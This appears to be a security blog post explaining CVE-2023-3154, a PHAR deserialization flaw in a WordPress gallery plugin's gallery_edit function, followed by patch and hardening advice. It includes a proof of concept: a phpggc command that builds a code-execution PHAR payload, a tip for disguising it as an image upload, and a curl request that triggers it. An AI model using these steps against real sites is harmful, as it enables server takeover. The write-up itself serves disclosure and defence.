CVE-2023-3154 - How WordPress Gallery Plugin PHAR Deserialization Flaw Risks Site Control (Exploit Included)

The WordPress Gallery Plugin is among the most popular solutions for creating image galleries on the world’s #1 CMS. But if you’re running a version below 3.39, your website could be asking for trouble—CVE-2023-3154 reveals how inadequate input validation in the gallery_edit function lets attackers abuse PHP’s serialization to run code or access secure files on your server.

This post breaks down how the attack works, includes easy code snippets, and explains how to keep your sites safe. Let’s get into it.

Vulnerability: PHAR Deserialization via user input

- Affected Plugin: WordPress Gallery Plugin

Function at Fault: gallery_edit

- CVE entry reference: NVD - CVE-2023-3154

Why does this matter?

WordPress plugins often handle files and user data, which should always be validated. This bug lets hackers feed a special “PHAR” file into the plugin, sneaking their own PHP objects into your site so they can access sensitive info or even run malicious code.

Understanding PHAR Deserialization

PHAR stands for PHP Archive. It’s like a zip file that can store PHP code and objects. If a plugin uses dangerous functions like unserialize() on user input (for example, file uploads or paths), a crafted PHAR file can make PHP run attacker-chosen code.

Example flow

1. Attacker uploads a PHAR file somewhere on the server (e.g., through an image or attachment upload).

User or plugin triggers gallery editing, sending a path to the PHAR file as a parameter.

3. The vulnerable gallery_edit function loads the file path directly—without sanity checking input—so PHP picks up the PHAR and reads its metadata as PHP objects.

Exploit Details (Code Included)

Here’s an example _PoC_ (proof of concept), using PHP code and curl, showing how this works. Warning: don’t try this on live sites!

Step 1: Prepare a malicious PHAR payload

- You’ll need PHPGGC (a great gadget chain tool).

Generate a PHAR file with a PHP object chain that fits your environment.

phpggc monolog/rce1 system 'id' -p phar -o evil.phar

This generates a PHAR file, evil.phar, that will execute id on the shell when loaded.

Step 2: Upload the PHAR archive to the server

If uploading “.phar” is blocked, try disguising it as an allowed image (e.g., evil.php.jpg), but keep PHAR structure intact.

Here’s a mock request (using curl) to the plugin admin page

curl -b "wordpress_logged_in_cookie" \
     -F "id=1" \
     -F "img=phar:///path/to/uploads/evil.phar/photo.jpg" \
     https://example.com/wp-admin/admin-ajax.php?action=gallery_edit

Replace /path/to/uploads/evil.phar/photo.jpg with your uploaded payload’s real path.

The vulnerable PHP code (pseudocode)

function gallery_edit() {
    $img = $_POST['img'];
    // BAD: No input validation on $img
    $image = file_get_contents($img);
    // ... procession continues ...
}

Original References

- CVE-2023-3154 @ NVD
- WPScan Advisory
- WordPress Gallery Plugin

How to Stay Safe

1. Update the plugin to version 3.39 or newer where this is fixed. Get it here.

Audit similar code (especially file handling, file_get_contents, unserialize, etc.)

3. Harden uploads: Block uploading of .phar/.php extensions, check MIME types, and store files outside web root if possible.
4. Use a WAF (Web Application Firewall), like Sucuri or Wordfence, for another layer against exploitation.

Final Thoughts

PHAR deserialization bugs are subtle, dangerous, and easy to miss—but can mean full compromise if left unattended. If you run the Gallery Plugin, upgrade now. Devs: always validate user input, especially file paths and anything that touches file/data functions.

Stay safe and patch smart.

Post by Security Deep Dive
*If you liked this write-up, leave a comment or share!*

Timeline

Published on: 10/16/2023 20:15:14 UTC
Last modified on: 11/07/2023 04:18:04 UTC